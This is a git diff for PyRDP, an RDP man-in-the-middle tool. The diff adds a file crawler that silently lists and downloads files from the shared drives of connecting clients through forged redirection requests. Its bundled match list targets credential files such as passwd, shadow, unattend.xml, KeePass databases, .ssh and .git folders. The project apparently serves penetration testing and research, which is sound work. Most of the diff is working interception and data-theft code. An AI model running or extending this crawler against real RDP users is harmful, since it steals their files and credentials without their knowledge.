diff --git a/CHANGELOG.adoc b/CHANGELOG.adoc
index b9fb78d84..3d8db08bb 100644
--- a/CHANGELOG.adoc
+++ b/CHANGELOG.adoc
@@ -11,6 +11,7 @@ For a detailed view of what has changed, refer to the {uri-repo}/commits/master[
 === Enhancements
 
 * Add recursive folder download from the PyRDP Player and a queue to download files ({uri-issue}140[#140])
+* Add a file crawler to automatically download files from client drives using pattern files ({uri-issue}141[#141])
 
 === Bug fixes
 
diff --git a/README.md b/README.md
index 3fc0f8231..e96231d8d 100644
--- a/README.md
+++ b/README.md
@@ -6,8 +6,9 @@ It features a few tools:
   - Logs credentials used when connecting
   - Steals data copied to the clipboard
   - Saves a copy of the files transferred over the network
+  - Crawls shared drives in the background and saves their contents locally
   - Saves replays of connections so you can look at them later
-  - Run console commands or PowerShell payloads automatically on new connections
+  - Runs console commands or PowerShell payloads automatically on new connections
 - RDP Player:
   - See live RDP connections coming from the MITM
   - View replays of RDP connections
diff --git a/bin/pyrdp-mitm.py b/bin/pyrdp-mitm.py
index 3599ba46d..8f8a83a36 100755
--- a/bin/pyrdp-mitm.py
+++ b/bin/pyrdp-mitm.py
@@ -46,9 +46,16 @@ def __init__(self, config: MITMConfig):
 
     def buildProtocol(self, addr):
         sessionID = f"{names.get_first_name()}{random.randrange(100000,999999)}"
-        logger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
-        logger = SessionLogger(logger, sessionID)
-        mitm = RDPMITM(logger, self.config)
+
+        # The main logger logs to a file and to stdout
+        mainLogger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
+        mainLogger = SessionLogger(mainLogger, sessionID)
+
+        # The crawler logger only logs to a file, for analysis purposes
+        crawlerLogger = logging.getLogger(LOGGER_NAMES.CRAWLER)
+        crawlerLogger = SessionLogger(crawlerLogger, sessionID)
+
+        mitm = RDPMITM(mainLogger, crawlerLogger, self.config)
 
         return mitm.getProtocol()
 
@@ -87,6 +94,21 @@ def prepareLoggers(logLevel: int, logFilter: str, sensorID: str, outDir: Path):
     connectionsLogger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
     connectionsLogger.addHandler(jsonFileHandler)
 
+    crawlerFormatter = VariableFormatter("[{asctime}] - {sessionID} - {message}", style = "{", defaultVariables = {
+        "sessionID": "GLOBAL"
+    })
+
+    crawlerFileHandler = logging.FileHandler(logDir / "crawl.log")
+    crawlerFileHandler.setFormatter(crawlerFormatter)
+
+    jsonCrawlerFileHandler = logging.FileHandler(logDir / "crawl.json")
+    jsonCrawlerFileHandler.setFormatter(JSONFormatter({"sensor": sensorID}))
+
+    crawlerLogger = logging.getLogger(LOGGER_NAMES.CRAWLER)
+    crawlerLogger.addHandler(crawlerFileHandler)
+    crawlerLogger.addHandler(jsonCrawlerFileHandler)
+    crawlerLogger.setLevel(logging.INFO)
+
     log.prepareSSLLogger(logDir / "ssl.log")
 
 
@@ -169,6 +191,9 @@ def main():
     parser.add_argument("--payload-powershell-file", help="PowerShell script to run automatically upon connection (as -EncodedCommand)", default=None)
     parser.add_argument("--payload-delay", help="Time to wait after a new connection before sending the payload, in milliseconds", default=None)
     parser.add_argument("--payload-duration", help="Amount of time for which input / output should be dropped, in milliseconds. This can be used to hide the payload screen.", default=None)
+    parser.add_argument("--crawl", help="Enable automatic shared drive scraping", action="store_true")
+    parser.add_argument("--crawler-match-file", help="File to be used by the crawler to choose which files to download when scraping the client shared drives.", default=None)
+    parser.add_argument("--crawler-ignore-file", help="File to be used by the crawler to choose which folders to avoid when scraping the client shared drives.", default=None)
     parser.add_argument("--no-replay", help="Disable replay recording", action="store_true")
 
     args = parser.parse_args()
 
@@ -210,6 +235,9 @@ def main():
     config.replacementUsername = args.username
     config.replacementPassword = args.password
     config.outDir = outDir
+    config.enableCrawler = args.crawl
+    config.crawlerMatchFileName = args.crawler_match_file
+    config.crawlerIgnoreFileName = args.crawler_ignore_file
     config.recordReplays = not args.no_replay
 
diff --git a/pyrdp/logging/adapters.py b/pyrdp/logging/adapters.py
index b1c49d5ee..71e3fc24c 100644
--- a/pyrdp/logging/adapters.py
+++ b/pyrdp/logging/adapters.py
@@ -19,6 +19,7 @@ def __init__(self, logger: logging.Logger, sessionID: str):
         :param sessionID: session ID value.
         """
         super().__init__(logger, {"sessionID": sessionID})
+        self.sessionID = sessionID
 
     def createChild(self, childName: str, sessionID: str = None) -> 'SessionLogger':
         """
diff --git a/pyrdp/logging/log.py b/pyrdp/logging/log.py
index 885c8b51a..52264bb26 100644
--- a/pyrdp/logging/log.py
+++ b/pyrdp/logging/log.py
@@ -11,12 +11,15 @@
 
 
 class LOGGER_NAMES:
+    # Root logger
     PYRDP = "pyrdp"
    MITM = f"{PYRDP}.mitm"
    MITM_CONNECTIONS = f"{MITM}.connections"
    PLAYER = f"{PYRDP}.player"
    PLAYER_UI = f"{PLAYER}.ui"
+    # Independent logger
+    CRAWLER = "crawler"
 
 
 def getSSLLogger():
     """
@@ -24,7 +27,6 @@ def getSSLLogger():
     """
     return logging.getLogger("ssl")
 
-
 def prepareSSLLogger(path: Path):
     """
     Prepares the SSL master secret logger.
@@ -45,7 +47,6 @@ def prepareSSLLogger(path: Path):
     logger.addHandler(streamHandler)
     logger.setLevel(logging.INFO)
 
-
 def info(*args):
     logging.getLogger(LOGGER_NAMES.PYRDP).info(*args)
 
diff --git a/pyrdp/mitm/FileCrawlerMITM.py b/pyrdp/mitm/FileCrawlerMITM.py
new file mode 100644
index 000000000..656287a60
--- /dev/null
+++ b/pyrdp/mitm/FileCrawlerMITM.py
@@ -0,0 +1,314 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2019 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+import fnmatch
+from collections import defaultdict
+from logging import LoggerAdapter
+from pathlib import Path
+from typing import BinaryIO, Dict, List, Optional, Set
+
+from pyrdp.enum.virtual_channel.device_redirection import DeviceType
+from pyrdp.mitm.config import MITMConfig
+from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM, DeviceRedirectionMITMObserver
+from pyrdp.mitm.state import RDPMITMState
+from pyrdp.pdu import DeviceAnnounce
+
+
+class VirtualFile:
+    """
+    Component used to simplify syntax and wrap common file and directory attributes
+    """
+    def __init__(self, deviceID: int, name: str, filePath: str, isDirectory: bool):
+        """
+        :param deviceID: ID of the device used.
+        :param filePath: Unix-style path of the file.
+        :param isDirectory: True if the file is a directory.
+        """
+
+        self.deviceID = deviceID
+        self.name = name
+        self.path = filePath
+        self.isDirectory = isDirectory
+
+class FileCrawlerMITM(DeviceRedirectionMITMObserver):
+    """
+    Component used to automatically crawl each shared drive based on user-configurable patterns.
+
+    For each shared drive, we start by listing the root directory.
+
+    When listing a directory, we queue up files and directories in separate queues. If they match a "match pattern",
+    files go into the file download queue (matchedFileQueue),
+    matched directories go into another download queue to be recursively downloaded (matchedDirectoryQueue),
+    and unmatched directories go into the unvisitedDirectory queue, to be crawled later.
+
+    Directories matching an "ignore pattern" won't be added to the unvisitedDirectory queue.
+
+    When listing a directory that was flagged for download, every result is automatically
+    flagged for download and put in the appropriate download queue.
+
+    When done downloading files and directories, we repeat the process for every directory in the unvisitedDirectory queue.
+    """
+
+    def __init__(self, mainLogger: LoggerAdapter, fileLogger: LoggerAdapter, config: MITMConfig, state: RDPMITMState):
+        super().__init__()
+
+        self.log = mainLogger
+        self.fileLogger = fileLogger
+        self.state = state
+        self.config = config
+        self.devices: Dict[int, VirtualFile] = {}
+        self.deviceRedirection: Optional[DeviceRedirectionMITM] = None
+
+        # Pending crawler requests
+        self.fileDownloadRequests: Dict[int, Path] = {}
+        self.directoryListingRequests: Dict[int, Path] = {}
+        self.directoryListingLists: Dict[int, List[VirtualFile]] = defaultdict(list)
+
+        # Download management
+        self.downloadFiles: Dict[str, BinaryIO] = {}
+        self.downloadDirectories: Set[int] = set()
+
+        # Crawler detection patterns
+        self.matchPatterns: List[str] = []
+        self.ignorePatterns: List[str] = []
+
+        # Crawler queues
+        self.matchedFileQueue: List[VirtualFile] = []
+        self.matchedDirectoryQueue: List[VirtualFile] = []
+        self.unvisitedDirectory: List[VirtualFile] = []
+        self.unvisitedDrive: List[VirtualFile] = []
+
+    def setDeviceRedirectionComponent(self, deviceRedirection: DeviceRedirectionMITM):
+        """
+        Sets a reference to the component being observed. Only one component can be observed at a time.
+        If the patterns are not loaded yet, load them from the pattern files.
+        :param deviceRedirection: reference to the observed component.
+        """
+        if self.deviceRedirection:
+            self.deviceRedirection.removeObserver(self)
+
+        if deviceRedirection:
+            deviceRedirection.addObserver(self)
+
+        self.deviceRedirection = deviceRedirection
+        if not self.matchPatterns and not self.ignorePatterns:
+            self.preparePatterns()
+
+    def preparePatterns(self):
+        """
+        Load the patterns from either the default pattern files or the user-configured files.
+        Should only be called once.
+ """ + + matchPath = None + ignorePath = None + + # Get the default file in pyrdp/mitm/crawler_config + if self.config.crawlerMatchFileName: + matchPath = Path(self.config.crawlerMatchFileName).absolute() + else: + matchPath = Path(__file__).parent.absolute() / "crawler_config" / "match.txt" + + if self.config.crawlerIgnoreFileName: + ignorePath = Path(self.config.crawlerIgnoreFileName).absolute() + else: + ignorePath = Path(__file__).parent.absolute() / "crawler_config" / "ignore.txt" + + self.log.debug("Using match pattern file %(matchPath)s", {"matchPath": matchPath}) + self.matchPatterns = self.parsePatterns(matchPath) + + self.log.debug("Using ignore pattern file %(ignorePath)s", {"ignorePath": ignorePath}) + self.ignorePatterns = self.parsePatterns(ignorePath) + + def parsePatterns(self, path: str) -> List[str]: + patternList = [] + try: + with open(path, "r") as f: + for line in f: + if line and line[0] in ["#", " ", "\n"]: + continue + + patternList.append(line.lower().rstrip()) + except Exception as e: + self.log.exception(e) + self.log.error("Failed to open file %(path)s", {"path": path}) + + return patternList + + def dispatchDownload(self): + """ + Processes each queue in order of priority. + File download have priority over directory download. + Crawl each folder before visiting another drive. + """ + + # Download a queued file + if len(self.matchedFileQueue) != 0: + file = self.matchedFileQueue.pop() + self.downloadFile(file) + + # List a queued directory + elif len(self.matchedDirectoryQueue) != 0: + directory = self.matchedDirectoryQueue.pop() + self.listDirectory(directory.deviceID, directory.path, True) + + # List an unvisited directory + elif len(self.unvisitedDirectory) != 0: + directory = self.unvisitedDirectory.pop() + self.listDirectory(directory.deviceID, directory.path) + + # List an unvisited drive + elif len(self.unvisitedDrive) != 0: + drive = self.unvisitedDrive.pop() + + # TODO : Maybe dump whole drive if there isn't a lot of files? + # Maybe if theres no directory at the root directory -> dump all? + self.log.info("Begin crawling disk %(disk)s", {"disk" : drive.name}) + self.fileLogger.info("Begin crawling disk %(disk)s", {"disk" : drive.name}) + self.listDirectory(drive.deviceID, drive.path) + else: + self.log.info("Done crawling.") + + def addListingToDownloadQueue(self, requestID: int): + directoryList = self.directoryListingLists.pop(requestID, {}) + + for item in directoryList: + if item.name in ["", ".", ".."]: + continue + + if item.isDirectory: + self.matchedDirectoryQueue.append(item) + else: + self.matchedFileQueue.append(item) + self.dispatchDownload() + + def crawlListing(self, requestID: int): + """ + Match files and directories against the configured match and ignore patterns. + :param requestID: The ID of the request containing the directory listing. 
+ """ + + directoryList = self.directoryListingLists.pop(requestID, {}) + + for item in directoryList: + if item.name in ["", ".", ".."]: + continue + + insensitivePath = item.path.lower() + ignore = any(fnmatch.fnmatch(insensitivePath, p) for p in self.ignorePatterns) + if ignore: + continue + + matched = any(fnmatch.fnmatch(insensitivePath, p) for p in self.matchPatterns) + if item.isDirectory: + if matched: + self.log.info("Matched directory %(file)s", {"file" : item.path}) + self.matchedDirectoryQueue.append(item) + else: + self.unvisitedDirectory.append(item) + else: + if matched: + self.matchedFileQueue.append(item) + + self.fileLogger.info("%(file)s - %(isDirectory)s - %(isDownloaded)s", {"file" : item.path, "isDirectory": item.isDirectory, "isDownloaded": matched}) + self.dispatchDownload() + + def downloadFile(self, file: VirtualFile): + remotePath = file.path + basePath = f"{self.config.fileDir}/{self.log.sessionID}" + localPath = f"{basePath}{remotePath}" + + self.log.info("Saving %(remotePath)s to %(localPath)s", {"remotePath": remotePath, "localPath": localPath}) + + try: + # Create parent directory, don't raise error if it already exists + Path(localPath).parent.mkdir(parents=True, exist_ok=True) + targetFile = open(localPath, "wb") + except Exception as e: + self.log.exception(e) + self.log.error("Cannot save file: %(localPath)s", {"localPath": localPath}) + return + + self.downloadFiles[remotePath] = targetFile + self.deviceRedirection.sendForgedFileRead(file.deviceID, remotePath) + + def listDirectory(self, deviceID: int, path: str, download: bool = False): + """ + List the directory + :param deviceID: Drive we are actually listing. + :param path: Path of the directory we are listing. + :param download: Wether or not we need to download this directory. + """ + listingPath = str(Path(path).absolute()).replace("/", "\\") + + if not listingPath.endswith("*"): + if not listingPath.endswith("\\"): + listingPath += "\\" + + listingPath += "*" + + requestID = self.deviceRedirection.sendForgedDirectoryListing(deviceID, listingPath) + + # If the directory is flagged for download, keep trace of the incoming request to trigger download. + if download: + self.downloadDirectories.add(requestID) + + self.directoryListingRequests[requestID] = Path(path).absolute() + + def onDeviceAnnounce(self, device: DeviceAnnounce): + if device.deviceType == DeviceType.RDPDR_DTYP_FILESYSTEM: + + drive = VirtualFile(device.deviceID, device.preferredDOSName, "/", True) + + self.devices[drive.deviceID] = drive + self.unvisitedDrive.append(drive) + + # If the crawler hasn't started, start one instance + if len(self.devices) == 1: + self.dispatchDownload() + + def onFileDownloadResult(self, deviceID: int, requestID: int, path: str, offset: int, data: bytes): + remotePath = path.replace("\\", "/") + + targetFile = self.downloadFiles[remotePath] + targetFile.write(data) + + def onFileDownloadComplete(self, deviceID: int, requestID: int, path: str, errorCode: int): + remotePath = path.replace("\\", "/") + + file = self.downloadFiles.pop(remotePath) + file.close() + + if errorCode != 0: + # TODO : Handle common error codes like : + # 0xc0000022 : Permission error + # Doc : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/18d8fbe8-a967-4f1c-ae50-99ca8e491d2d + + self.log.error("Error happened when downloading %(remotePath)s. The file may not have been saved completely. 
Error code: %(errorCode)s", { + "remotePath": remotePath, + "errorCode": "0x%08lx" % errorCode, + }) + + self.dispatchDownload() + + def onDirectoryListingResult(self, deviceID: int, requestID: int, fileName: str, isDirectory: bool): + if requestID not in self.directoryListingRequests: + return + + path = self.directoryListingRequests[requestID] + filePath = path / fileName + + file = VirtualFile(deviceID, fileName, str(filePath), isDirectory) + directoryList = self.directoryListingLists[requestID] + directoryList.append(file) + + def onDirectoryListingComplete(self, deviceID: int, requestID: int): + self.directoryListingRequests.pop(requestID, {}) + + # If directory was flagged for download + if requestID in self.downloadDirectories: + self.downloadDirectories.remove(requestID) + self.addListingToDownloadQueue(requestID) + else: + self.crawlListing(requestID) diff --git a/pyrdp/mitm/RDPMITM.py b/pyrdp/mitm/RDPMITM.py index 2c23f1b52..0f961a894 100644 --- a/pyrdp/mitm/RDPMITM.py +++ b/pyrdp/mitm/RDPMITM.py @@ -24,6 +24,7 @@ from pyrdp.mitm.config import MITMConfig from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM from pyrdp.mitm.FastPathMITM import FastPathMITM +from pyrdp.mitm.FileCrawlerMITM import FileCrawlerMITM from pyrdp.mitm.layerset import RDPLayerSet from pyrdp.mitm.MCSMITM import MCSMITM from pyrdp.mitm.MITMRecorder import MITMRecorder @@ -42,25 +43,25 @@ class RDPMITM: Main MITM class. The job of this class is to orchestrate the components for all the protocols. """ - def __init__(self, log: SessionLogger, config: MITMConfig): + def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, config: MITMConfig): """ :param log: base logger to use for the connection :param config: the MITM configuration """ - self.log = log + self.log = mainLogger """Base logger for the connection""" - self.clientLog = log.createChild("client") + self.clientLog = mainLogger.createChild("client") """Base logger for the client side""" - self.serverLog = log.createChild("server") + self.serverLog = mainLogger.createChild("server") """Base logger for the server side""" - self.attackerLog = log.createChild("attacker") + self.attackerLog = mainLogger.createChild("attacker") """Base logger for the attacker side""" - self.rc4Log = log.createChild("rc4") + self.rc4Log = mainLogger.createChild("rc4") """Logger for RC4 secrets""" self.config = config @@ -108,6 +109,8 @@ def __init__(self, log: SessionLogger, config: MITMConfig): self.attacker: AttackerMITM = None + self.crawler: FileCrawlerMITM = None + self.client.x224.addObserver(X224Logger(self.getClientLog("x224"))) self.client.mcs.addObserver(MCSLogger(self.getClientLog("mcs"))) self.client.slowPath.addObserver(SlowPathLogger(self.getClientLog("slowpath"))) @@ -131,6 +134,9 @@ def __init__(self, log: SessionLogger, config: MITMConfig): replayFileName = "rdp_replay_{}_{}.pyrdp".format(date.strftime('%Y%m%d_%H-%M-%S'), date.microsecond // 1000) self.recorder.addTransport(FileLayer(self.config.replayDir / replayFileName)) + if config.enableCrawler: + self.crawler: FileCrawlerMITM = FileCrawlerMITM(self.getClientLog(MCSChannelName.DEVICE_REDIRECTION).createChild("crawler"), crawlerLogger, self.config, self.state) + def getProtocol(self) -> Protocol: """ Get the Protocol expected by Twisted. 
@@ -299,6 +305,9 @@ def buildDeviceChannel(self, client: MCSServerChannel, server: MCSClientChannel)
         deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.config, self.statCounter, self.state)
         self.channelMITMs[client.channelID] = deviceRedirection
 
+        if self.config.enableCrawler:
+            self.crawler.setDeviceRedirectionComponent(deviceRedirection)
+
         if self.attacker:
             self.attacker.setDeviceRedirectionComponent(deviceRedirection)
 
diff --git a/pyrdp/mitm/config.py b/pyrdp/mitm/config.py
index dcb7de314..0d2d5715f 100644
--- a/pyrdp/mitm/config.py
+++ b/pyrdp/mitm/config.py
@@ -53,6 +53,15 @@ def __init__(self):
         self.payloadDuration: int = None
         """Amount of time the payload should take to complete, in milliseconds"""
 
+        self.enableCrawler: bool = False
+        """Whether the crawler should be enabled or not"""
+
+        self.crawlerMatchFileName: str = None
+        """Path to the crawler match configuration file"""
+
+        self.crawlerIgnoreFileName: str = None
+        """Path to the crawler ignore configuration file"""
+
     @property
     def replayDir(self) -> Path:
         """
diff --git a/pyrdp/mitm/crawler_config/ignore.txt b/pyrdp/mitm/crawler_config/ignore.txt
new file mode 100644
index 000000000..7ebe365c2
--- /dev/null
+++ b/pyrdp/mitm/crawler_config/ignore.txt
@@ -0,0 +1,44 @@
+# Non-interesting / big Windows root folders
+/$Recycle.Bin
+/Boot
+/Recovery
+/BGinfo
+/PerfLogs
+
+# Dev packages folders
+*/node_modules
+*/vendor
+
+# Default files on Windows
+*/AppData/Local/Packages
+*/Common Files
+*/internet explorer
+*/Microsoft*
+*/UNP
+*/USOShared
+*/Windows*
+
+# Default VM folders
+*/Oracle
+*/PuppetLabs
+*/Puppet Labs
+
+# Package managers
+*/chocolatey
+
+# Non-interesting / big Linux root folders
+/bin
+/boot
+/dev
+/lib
+/lib64
+/lost+found
+/media
+/mnt
+/proc
+/run
+/sbin
+/snap
+/sys
+/tmp
+/usr
\ No newline at end of file
diff --git a/pyrdp/mitm/crawler_config/match.txt b/pyrdp/mitm/crawler_config/match.txt
new file mode 100644
index 000000000..38e26e93b
--- /dev/null
+++ b/pyrdp/mitm/crawler_config/match.txt
@@ -0,0 +1,34 @@
+# Common extensions
+*/*.txt
+*/*.pdf
+*/*.csv
+*/*.xls
+*/*.xlsx
+*/*.doc
+*/*.docx
+*/*.ppt
+*/*.pptx
+
+# Possible malware samples
+*/*.bat
+*/*.exe
+*/*.dll
+*/*.ps1
+
+# Credentials
+*/passwd
+*/shadow
+*/*unattend.xml
+*/*Unattended.xml
+*/*auth.json
+*/*.kdb
+*/*.kdbx
+
+
+
+
+
+# Awesome folders to dump :)
+*/.git
+*/ssh
+*/.ssh
\ No newline at end of file
diff --git a/pyrdp/player/LiveEventHandler.py b/pyrdp/player/LiveEventHandler.py
index 86fa79f45..8635da4b3 100644
--- a/pyrdp/player/LiveEventHandler.py
+++ b/pyrdp/player/LiveEventHandler.py
@@ -306,7 +306,7 @@ def handleDownloadComplete(self, response: PlayerFileDownloadCompletePDU):
         if response.error != 0:
             self.log.error("Error happened when downloading %(remotePath)s. The file may not have been saved completely. Error code: %(errorCode)s", {
                 "remotePath": remotePath,
-                "errorCode": '0x%08lx' % response.error,
+                "errorCode": "0x%08lx" % response.error,
             })
 
         try:
diff --git a/setup.py b/setup.py
index 66d531d7d..def31d44a 100755
--- a/setup.py
+++ b/setup.py
@@ -19,6 +19,7 @@
     author_email='egg997@gmail.com, flabelle@gosecure.ca',
     url='https://github.com/GoSecure/pyrdp',
     packages=setuptools.find_packages(include=["pyrdp", "pyrdp.*"]),
+    package_data={"pyrdp": ["mitm/crawler_config/*.txt"]},
    ext_modules=[Extension('rle', ['ext/rle.c'])],
    scripts=[
        'bin/pyrdp-clonecert.py',
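
A minimal standalone sketch (not part of the patch) of how FileCrawlerMITM.crawlListing applies the pattern files: paths are lowercased, ignore patterns are checked before match patterns, and matching uses fnmatch.fnmatch against the Unix-style path. The sample patterns, sample paths and the checkPath helper below are hypothetical.

    import fnmatch

    # Patterns as parsePatterns would load them: lowercased, comments and blank lines stripped
    matchPatterns = ["*/*.docx", "*/.ssh"]
    ignorePatterns = ["*/windows*"]

    def checkPath(path: str) -> str:
        # Mirrors the decision order in crawlListing
        insensitivePath = path.lower()
        if any(fnmatch.fnmatch(insensitivePath, p) for p in ignorePatterns):
            return "ignored"              # pruned: never visited, never downloaded
        if any(fnmatch.fnmatch(insensitivePath, p) for p in matchPatterns):
            return "queued for download"  # matchedFileQueue / matchedDirectoryQueue
        return "unvisited"                # directories land in unvisitedDirectory

    print(checkPath("/Users/bob/report.docx"))  # queued for download
    print(checkPath("/Windows/System32"))       # ignored
    print(checkPath("/Users/bob/Documents"))    # unvisited

Note that fnmatch translates * to a regex .* that also crosses path separators, which is why a pattern like */windows* prunes /Windows/System32 and everything below it.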
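Likewise, a standalone sketch of the path normalization listDirectory performs before calling sendForgedDirectoryListing: the crawler's Unix-style path is converted to a backslashed Windows path and a trailing wildcard is appended so the forged request lists the directory's contents. The toListingPath name is hypothetical, and the output assumes a POSIX host.

    from pathlib import Path

    def toListingPath(path: str) -> str:
        # Same normalization as FileCrawlerMITM.listDirectory
        listingPath = str(Path(path).absolute()).replace("/", "\\")
        if not listingPath.endswith("*"):
            if not listingPath.endswith("\\"):
                listingPath += "\\"
            listingPath += "*"
        return listingPath

    print(toListingPath("/"))           # \*
    print(toListingPath("/Users/bob"))  # \Users\bob\*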
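With the patch applied, the crawler is enabled per-run from the command line; the target address and pattern file paths below are illustrative, and the positional target argument is assumed from the existing pyrdp-mitm.py interface:

    pyrdp-mitm.py 192.168.1.100 --crawl --crawler-match-file custom_match.txt --crawler-ignore-file custom_ignore.txt

If --crawler-match-file or --crawler-ignore-file is omitted, preparePatterns falls back to the defaults bundled under pyrdp/mitm/crawler_config/ (match.txt and ignore.txt).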